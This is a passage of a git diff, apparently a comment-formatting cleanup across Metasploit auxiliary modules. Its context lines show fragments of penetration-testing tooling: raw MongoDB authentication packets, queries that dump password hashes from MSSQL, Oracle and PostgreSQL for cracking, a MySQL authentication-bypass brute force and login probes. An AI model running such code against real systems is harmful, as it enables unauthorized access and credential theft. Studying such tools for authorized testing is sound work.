packet << "\x01\x00\x00\x00" # numberToReturn (1)
|
||||
# query ({"listDatabases"=>1})
|
||||
packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
|
||||
|
||||
sock.put(packet)
|
||||
@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def auth(user, password, nonce)
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\xff\xff\xff\xff" #numberToReturn (1)
|
||||
packet = request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << datastore['DB'] + ".$cmd" + "\x00" # fullCollectionName (DB.$cmd)
|
||||
packet << "\x00\x00\x00\x00" # numberToSkip (0)
|
||||
packet << "\xff\xff\xff\xff" # numberToReturn (1)
|
||||
|
||||
#{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"}
|
||||
document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65"
|
||||
@ -109,12 +109,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00"
|
||||
document << Rex::Text.md5(nonce + user + Rex::Text.md5(user + ":mongo:" + password)) + "\x00"
|
||||
document << "\x00"
|
||||
#Calculate document length
|
||||
# Calculate document length
|
||||
document.insert(0, [document.length + 4].pack("L"))
|
||||
|
||||
packet += document
|
||||
|
||||
#Calculate messageLength
|
||||
# Calculate messageLength
|
||||
packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength
|
||||
sock.put(packet)
|
||||
response = sock.recv(1024)
|
||||
@ -137,15 +137,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def get_nonce
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = "\x3d\x00\x00\x00" #messageLength (61)
|
||||
packet << request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (test.$cmd)
|
||||
packet = "\x3d\x00\x00\x00" # messageLength (61)
|
||||
packet << request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (test.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\x01\x00\x00\x00" #numberToReturn (1)
|
||||
#query {"getnonce"=>1.0}
|
||||
# query {"getnonce"=>1.0}
|
||||
packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00"
|
||||
|
||||
sock.put(packet)
|
||||
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def have_auth_error?(response)
|
||||
#Response header 36 bytes long
|
||||
# Response header 36 bytes long
|
||||
documents = response[36..1024]
|
||||
#{"errmsg"=>"auth fails", "ok"=>0.0}
|
||||
#{"errmsg"=>"need to login", "ok"=>0.0}
|
||||
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
create_credential_login(login_data)
|
||||
|
||||
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
|
||||
print_status("Instance Name: #{instancename.inspect}")
|
||||
version = mssql_query(mssql_sql_info())[:rows][0][0]
|
||||
@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#Stores the grabbed hashes as loot for later cracking
|
||||
#The hash format is slightly different between 2k and 2k5/2k8
|
||||
# Stores the grabbed hashes as loot for later cracking
|
||||
# The hash format is slightly different between 2k and 2k5/2k8
|
||||
def report_hashes(mssql_hashes, version_year)
|
||||
|
||||
case version_year
|
||||
@ -154,8 +154,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Grabs the user tables depending on what Version of MSSQL
|
||||
#The queries are different between 2k and 2k/2k8
|
||||
# Grabs the user tables depending on what Version of MSSQL
|
||||
# The queries are different between 2k and 2k/2k8
|
||||
def mssql_hashdump(version_year)
|
||||
is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]
|
||||
|
||||
|
@ -40,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
|
||||
instancename = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
|
||||
print_status("Instance Name: #{instancename.inspect}")
|
||||
version = mssql_query(mssql_sql_info())[:rows][0][0]
|
||||
output = "Microsoft SQL Server Schema \n Host: #{datastore['RHOST']} \n Port: #{datastore['RPORT']} \n Instance: #{instancename} \n Version: #{version} \n====================\n\n"
|
||||
|
||||
#Grab all the DB schema and save it as notes
|
||||
# Grab all the DB schema and save it as notes
|
||||
mssql_schema = get_mssql_schema
|
||||
return nil if mssql_schema.nil? or mssql_schema.empty?
|
||||
mssql_schema.each do |db|
|
||||
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#Gets all of the Databases on this Instance
|
||||
# Gets all of the Databases on this Instance
|
||||
def get_db_names
|
||||
results = mssql_query(mssql_db_names())[:rows]
|
||||
return results
|
||||
end
|
||||
|
||||
#Gets all the table names for the given DB
|
||||
# Gets all the table names for the given DB
|
||||
def get_tbl_names(db_name)
|
||||
results = mssql_query("SELECT name,id FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
|
||||
return results
|
||||
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [
|
||||
'theLightCosine', # Original hashdump module
|
||||
'jcran' # Authentication bypass bruteforce implementation
|
||||
'jcran' # Authentication bypass bruteforce implementation
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2012-2122'],
|
||||
|
@ -18,11 +18,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MySQL Login Utility',
|
||||
'Name' => 'MySQL Login Utility',
|
||||
'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',
|
||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
]
|
||||
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return mysql_schema
|
||||
end
|
||||
|
||||
#Gets all of the Tables names inside the given Database
|
||||
# Gets all of the Tables names inside the given Database
|
||||
def get_tbl_names(dbname)
|
||||
|
||||
tables=[]
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module scans NFS mounts and their permissions.
|
||||
},
|
||||
'Author' => ['<tebo[at]attackresearch.com>'],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '1999-0170'],
|
||||
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
|
||||
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
resp = sunrpc_call(procedure, "")
|
||||
|
||||
# XXX: Assume that transport is udp and port is 2049
|
||||
# Technically we are talking to mountd not nfsd
|
||||
# Technically we are talking to mountd not nfsd
|
||||
|
||||
report_service(
|
||||
:host => ip,
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Called for each response packet
|
||||
# Called for each response packet
|
||||
def scanner_process(data, shost, sport)
|
||||
@results[shost] ||= { messages: [], peers: [] }
|
||||
@results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)
|
||||
@ -148,14 +148,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
idx = 0
|
||||
peer_tuples = []
|
||||
1.upto(pcnt) do
|
||||
#u_int32 firsttime; /* first time we received a packet */
|
||||
#u_int32 lasttime; /* last packet from this host */
|
||||
#u_int32 restr; /* restrict bits (was named lastdrop) */
|
||||
#u_int32 count; /* count of packets received */
|
||||
#u_int32 addr; /* host address V4 style */
|
||||
#u_int32 daddr; /* destination host address */
|
||||
#u_int32 flags; /* flags about destination */
|
||||
#u_short port; /* port number of last reception */
|
||||
# u_int32 firsttime; /* first time we received a packet */
|
||||
# u_int32 lasttime; /* last packet from this host */
|
||||
# u_int32 restr; /* restrict bits (was named lastdrop) */
|
||||
# u_int32 count; /* count of packets received */
|
||||
# u_int32 addr; /* host address V4 style */
|
||||
# u_int32 daddr; /* destination host address */
|
||||
# u_int32 flags; /* flags about destination */
|
||||
# u_short port; /* port number of last reception */
|
||||
|
||||
_,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack("NNNNNNNn")
|
||||
|
||||
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(ip)
|
||||
return if not check_dependencies
|
||||
|
||||
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
#Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
# Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
# Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
is_11g=false
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
#Get the usernames and hashes for 8g-10g
|
||||
# Get the usernames and hashes for 8g-10g
|
||||
begin
|
||||
if is_11g==false
|
||||
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tbl << row
|
||||
end
|
||||
end
|
||||
#Get the usernames and hashes for 11g
|
||||
# Get the usernames and hashes for 11g
|
||||
else
|
||||
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
results= prepare_exec(query)
|
||||
@ -97,8 +97,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def report_hashes(table, is_11g, ip, service)
|
||||
#reports the hashes slightly differently depending on the version
|
||||
#This is so that we know which are which when we go to crack them
|
||||
# Reports the hashes slightly differently depending on the version
|
||||
# This is so that we know which are which when we go to crack them
|
||||
if is_11g==false
|
||||
jtr_format = "des"
|
||||
else
|
||||
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
# Based vaugely on each_user_pass in AuthBrute
|
||||
# Based vaguely on each_user_pass in AuthBrute
|
||||
def each_sid(&block)
|
||||
@@oracle_sid_fail = []
|
||||
@@oracle_sid_success = []
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet = sock.read(100)
|
||||
find_packet = packet.include? "(ERROR_STACK=(ERROR="
|
||||
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
|
||||
#TODO: Module should report_vuln if this finding is solid.
|
||||
# TODO: Module should report_vuln if this finding is solid.
|
||||
rescue ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
print_error("#{ip}:#{rport} unable to connect to the server")
|
||||
end
|
||||
|
@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#database links
|
||||
# database links
|
||||
res = send_request_raw({
|
||||
'uri' => '/oradb/PUBLIC/ALL_DB_LINKS',
|
||||
'version' => '1.1',
|
||||
|
@ -74,19 +74,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def do_login(user, pass, nsock=self.sock)
|
||||
#Check if we are already at a logon prompt
|
||||
# Check if we are already at a logon prompt
|
||||
res = nsock.get_once(-1,5)
|
||||
euser = encryption_header(encrypt(user))
|
||||
nsock.put(euser)
|
||||
res = nsock.get_once(-1,5)
|
||||
|
||||
#See if this knocked a login prompt loose
|
||||
# See if this knocked a login prompt loose
|
||||
if pca_at_login?(res)
|
||||
nsock.put(euser)
|
||||
res = nsock.get_once(-1,5)
|
||||
end
|
||||
|
||||
#Check if we are now at the password prompt
|
||||
# Check if we are now at the password prompt
|
||||
unless res and res.include? "Enter password"
|
||||
print_error "Problem Sending Login: #{res.inspect}"
|
||||
return :abort
|
||||
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
begin
|
||||
res = connect
|
||||
res = connect
|
||||
banner = sock.get_once(-1, 30)
|
||||
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
|
||||
print_status("#{ip}:#{rport} POP3 #{banner_sanitized}")
|
||||
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status(" TCP OPEN|FILTERED #{dhost}:#{dport}")
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => dhost,
|
||||
:proto => 'tcp',
|
||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
#Query the Postgres Shadow table for username and password hashes and report them
|
||||
# Query the Postgres Shadow table for username and password hashes and report them
|
||||
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
|
||||
|
||||
service_data = {
|
||||
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
# Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
print_error("A Connection Error occured")
|
||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def smart_query(query_string)
|
||||
res = postgres_query(query_string,false)
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
# Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
print_error("A Connection Error occured")
|
||||
|
@ -71,7 +71,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# Reporting
|
||||
|
||||
report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# Logout
|
||||
|
||||
postgres_logout
|
||||
|
||||
rescue Rex::ConnectionError
|
||||
|
@ -108,8 +108,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# For debugging only.
|
||||
#rescue ::Exception
|
||||
# print_error("#{$!}")
|
||||
# return :abort
|
||||
# print_error("#{$!}")
|
||||
#return :abort
|
||||
|
||||
ensure
|
||||
disconnect()
|
||||
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
#read input register=func:04, register 1
|
||||
# read input register=func:04, register 1
|
||||
sploit="\x21\x00\x00\x00\x00\x06\x01\x04\x00\x01\x00\x00"
|
||||
sploit[6] = [datastore['UNIT_ID']].pack("C")
|
||||
connect()
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user